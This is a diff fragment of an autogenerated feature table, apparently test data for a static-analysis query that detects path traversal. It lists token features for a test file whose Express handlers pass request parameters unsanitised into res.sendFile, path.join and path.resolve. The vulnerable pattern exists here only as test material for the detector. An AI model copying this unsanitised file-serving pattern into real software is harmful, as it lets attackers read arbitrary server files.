sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:22:16:22:22 | 'data/' | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:22:16:22:22 | 'data/' | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:22:16:22:22 | 'data/' | stringConcatenatedWith | -endpoint- req.params.x | | autogenerated/TaintedPath/tainted-sendFile.js:22:16:22:37 | 'data/' ... arams.x | CalleeFlexibleAccessPath | res.sendfile | | autogenerated/TaintedPath/tainted-sendFile.js:22:16:22:37 | 'data/' ... arams.x | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-sendFile.js:22:16:22:37 | 'data/' ... arams.x | contextFunctionInterfaces | | @@ -11101,6 +86372,72 @@ tokenFeatures | autogenerated/TaintedPath/tainted-sendFile.js:22:16:22:37 | 'data/' ... arams.x | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/tainted-sendFile.js:22:16:22:37 | 'data/' ... arams.x | fileImports | express path | | autogenerated/TaintedPath/tainted-sendFile.js:22:16:22:37 | 'data/' ... arams.x | receiverName | res | +| autogenerated/TaintedPath/tainted-sendFile.js:22:26:22:28 | req | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:22:26:22:28 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:22:26:22:28 | req | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:22:26:22:28 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:22:26:22:28 | req | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:22:26:22:35 | req.params | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:22:26:22:35 | req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:22:26:22:35 | req.params | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:22:26:22:35 | req.params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:22:26:22:35 | req.params | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:22:26:22:37 | req.params.x | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:22:26:22:37 | req.params.x | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:22:26:22:37 | req.params.x | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:22:26:22:37 | req.params.x | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:22:26:22:37 | req.params.x | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:22:26:22:37 | req.params.x | stringConcatenatedWith | 'data/' -endpoint- | +| autogenerated/TaintedPath/tainted-sendFile.js:22:30:22:35 | params | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:22:30:22:35 | params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:22:30:22:35 | params | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:22:30:22:35 | params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:22:30:22:35 | params | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:22:37:22:37 | x | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:22:37:22:37 | x | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:22:37:22:37 | x | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:22:37:22:37 | x | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:22:37:22:37 | x | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:24:3:24:5 | res | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:24:3:24:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:24:3:24:5 | res | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:24:3:24:5 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:24:3:24:5 | res | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:24:3:24:14 | res.sendFile | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:24:3:24:14 | res.sendFile | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:24:3:24:14 | res.sendFile | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:24:3:24:14 | res.sendFile | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:24:3:24:14 | res.sendFile | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:24:3:24:50 | exceptional return of res.sen ... ams.x)) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:24:3:24:50 | exceptional return of res.sen ... ams.x)) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-sendFile.js:24:3:24:50 | exceptional return of res.sen ... ams.x)) | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:24:3:24:50 | exceptional return of res.sen ... ams.x)) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:24:3:24:50 | exceptional return of res.sen ... ams.x)) | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:24:3:24:50 | res.sen ... ams.x)) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:24:3:24:50 | res.sen ... ams.x)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:24:3:24:50 | res.sen ... ams.x)) | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:24:3:24:50 | res.sen ... ams.x)) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:24:3:24:50 | res.sen ... ams.x)) | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:24:7:24:14 | sendFile | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:24:7:24:14 | sendFile | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:24:7:24:14 | sendFile | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:24:7:24:14 | sendFile | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:24:7:24:14 | sendFile | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:24:16:24:19 | path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:24:16:24:19 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:24:16:24:19 | path | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:24:16:24:19 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:24:16:24:19 | path | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:24:16:24:27 | path.resolve | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:24:16:24:27 | path.resolve | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:24:16:24:27 | path.resolve | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:24:16:24:27 | path.resolve | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:24:16:24:27 | path.resolve | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:24:16:24:49 | exceptional return of path.re ... rams.x) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:24:16:24:49 | exceptional return of path.re ... rams.x) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-sendFile.js:24:16:24:49 | exceptional return of path.re ... rams.x) | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:24:16:24:49 | exceptional return of path.re ... rams.x) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:24:16:24:49 | exceptional return of path.re ... rams.x) | fileImports | express path | | autogenerated/TaintedPath/tainted-sendFile.js:24:16:24:49 | path.re ... rams.x) | CalleeFlexibleAccessPath | res.sendFile | | autogenerated/TaintedPath/tainted-sendFile.js:24:16:24:49 | path.re ... rams.x) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-sendFile.js:24:16:24:49 | path.re ... rams.x) | contextFunctionInterfaces | | @@ -11109,6 +86446,11 @@ tokenFeatures | autogenerated/TaintedPath/tainted-sendFile.js:24:16:24:49 | path.re ... rams.x) | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/tainted-sendFile.js:24:16:24:49 | path.re ... rams.x) | fileImports | express path | | autogenerated/TaintedPath/tainted-sendFile.js:24:16:24:49 | path.re ... rams.x) | receiverName | res | +| autogenerated/TaintedPath/tainted-sendFile.js:24:21:24:27 | resolve | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:24:21:24:27 | resolve | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:24:21:24:27 | resolve | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:24:21:24:27 | resolve | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:24:21:24:27 | resolve | fileImports | express path | | autogenerated/TaintedPath/tainted-sendFile.js:24:29:24:34 | 'data' | CalleeFlexibleAccessPath | path.resolve | | autogenerated/TaintedPath/tainted-sendFile.js:24:29:24:34 | 'data' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-sendFile.js:24:29:24:34 | 'data' | calleeImports | path | @@ -11118,6 +86460,16 @@ tokenFeatures | autogenerated/TaintedPath/tainted-sendFile.js:24:29:24:34 | 'data' | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/tainted-sendFile.js:24:29:24:34 | 'data' | fileImports | express path | | autogenerated/TaintedPath/tainted-sendFile.js:24:29:24:34 | 'data' | receiverName | path | +| autogenerated/TaintedPath/tainted-sendFile.js:24:37:24:39 | req | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:24:37:24:39 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:24:37:24:39 | req | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:24:37:24:39 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:24:37:24:39 | req | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:24:37:24:46 | req.params | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:24:37:24:46 | req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:24:37:24:46 | req.params | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:24:37:24:46 | req.params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:24:37:24:46 | req.params | fileImports | express path | | autogenerated/TaintedPath/tainted-sendFile.js:24:37:24:48 | req.params.x | CalleeFlexibleAccessPath | path.resolve | | autogenerated/TaintedPath/tainted-sendFile.js:24:37:24:48 | req.params.x | InputArgumentIndex | 1 | | autogenerated/TaintedPath/tainted-sendFile.js:24:37:24:48 | req.params.x | calleeImports | path | @@ -11127,6 +86479,56 @@ tokenFeatures | autogenerated/TaintedPath/tainted-sendFile.js:24:37:24:48 | req.params.x | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/tainted-sendFile.js:24:37:24:48 | req.params.x | fileImports | express path | | autogenerated/TaintedPath/tainted-sendFile.js:24:37:24:48 | req.params.x | receiverName | path | +| autogenerated/TaintedPath/tainted-sendFile.js:24:41:24:46 | params | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:24:41:24:46 | params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:24:41:24:46 | params | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:24:41:24:46 | params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:24:41:24:46 | params | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:24:48:24:48 | x | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:24:48:24:48 | x | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:24:48:24:48 | x | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:24:48:24:48 | x | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:24:48:24:48 | x | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:25:3:25:5 | res | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:25:3:25:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:25:3:25:5 | res | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:25:3:25:5 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:25:3:25:5 | res | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:25:3:25:14 | res.sendfile | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:25:3:25:14 | res.sendfile | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:25:3:25:14 | res.sendfile | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:25:3:25:14 | res.sendfile | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:25:3:25:14 | res.sendfile | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:25:3:25:47 | exceptional return of res.sen ... ams.x)) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:25:3:25:47 | exceptional return of res.sen ... ams.x)) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-sendFile.js:25:3:25:47 | exceptional return of res.sen ... ams.x)) | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:25:3:25:47 | exceptional return of res.sen ... ams.x)) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:25:3:25:47 | exceptional return of res.sen ... ams.x)) | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:25:3:25:47 | res.sen ... ams.x)) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:25:3:25:47 | res.sen ... ams.x)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:25:3:25:47 | res.sen ... ams.x)) | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:25:3:25:47 | res.sen ... ams.x)) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:25:3:25:47 | res.sen ... ams.x)) | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:25:7:25:14 | sendfile | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:25:7:25:14 | sendfile | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:25:7:25:14 | sendfile | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:25:7:25:14 | sendfile | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:25:7:25:14 | sendfile | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:25:16:25:19 | path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:25:16:25:19 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:25:16:25:19 | path | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:25:16:25:19 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:25:16:25:19 | path | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:25:16:25:24 | path.join | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:25:16:25:24 | path.join | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:25:16:25:24 | path.join | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:25:16:25:24 | path.join | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:25:16:25:24 | path.join | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:25:16:25:46 | exceptional return of path.jo ... rams.x) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:25:16:25:46 | exceptional return of path.jo ... rams.x) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-sendFile.js:25:16:25:46 | exceptional return of path.jo ... rams.x) | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:25:16:25:46 | exceptional return of path.jo ... rams.x) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:25:16:25:46 | exceptional return of path.jo ... rams.x) | fileImports | express path | | autogenerated/TaintedPath/tainted-sendFile.js:25:16:25:46 | path.jo ... rams.x) | CalleeFlexibleAccessPath | res.sendfile | | autogenerated/TaintedPath/tainted-sendFile.js:25:16:25:46 | path.jo ... rams.x) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-sendFile.js:25:16:25:46 | path.jo ... rams.x) | contextFunctionInterfaces | | @@ -11135,6 +86537,11 @@ tokenFeatures | autogenerated/TaintedPath/tainted-sendFile.js:25:16:25:46 | path.jo ... rams.x) | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/tainted-sendFile.js:25:16:25:46 | path.jo ... rams.x) | fileImports | express path | | autogenerated/TaintedPath/tainted-sendFile.js:25:16:25:46 | path.jo ... rams.x) | receiverName | res | +| autogenerated/TaintedPath/tainted-sendFile.js:25:21:25:24 | join | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:25:21:25:24 | join | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:25:21:25:24 | join | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:25:21:25:24 | join | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:25:21:25:24 | join | fileImports | express path | | autogenerated/TaintedPath/tainted-sendFile.js:25:26:25:31 | 'data' | CalleeFlexibleAccessPath | path.join | | autogenerated/TaintedPath/tainted-sendFile.js:25:26:25:31 | 'data' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-sendFile.js:25:26:25:31 | 'data' | calleeImports | path | @@ -11144,6 +86551,16 @@ tokenFeatures | autogenerated/TaintedPath/tainted-sendFile.js:25:26:25:31 | 'data' | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/tainted-sendFile.js:25:26:25:31 | 'data' | fileImports | express path | | autogenerated/TaintedPath/tainted-sendFile.js:25:26:25:31 | 'data' | receiverName | path | +| autogenerated/TaintedPath/tainted-sendFile.js:25:34:25:36 | req | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:25:34:25:36 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:25:34:25:36 | req | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:25:34:25:36 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:25:34:25:36 | req | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:25:34:25:43 | req.params | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:25:34:25:43 | req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:25:34:25:43 | req.params | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:25:34:25:43 | req.params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:25:34:25:43 | req.params | fileImports | express path | | autogenerated/TaintedPath/tainted-sendFile.js:25:34:25:45 | req.params.x | CalleeFlexibleAccessPath | path.join | | autogenerated/TaintedPath/tainted-sendFile.js:25:34:25:45 | req.params.x | InputArgumentIndex | 1 | | autogenerated/TaintedPath/tainted-sendFile.js:25:34:25:45 | req.params.x | calleeImports | path | @@ -11153,6 +86570,47 @@ tokenFeatures | autogenerated/TaintedPath/tainted-sendFile.js:25:34:25:45 | req.params.x | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/tainted-sendFile.js:25:34:25:45 | req.params.x | fileImports | express path | | autogenerated/TaintedPath/tainted-sendFile.js:25:34:25:45 | req.params.x | receiverName | path | +| autogenerated/TaintedPath/tainted-sendFile.js:25:38:25:43 | params | contextFunctionInterfaces | | +| 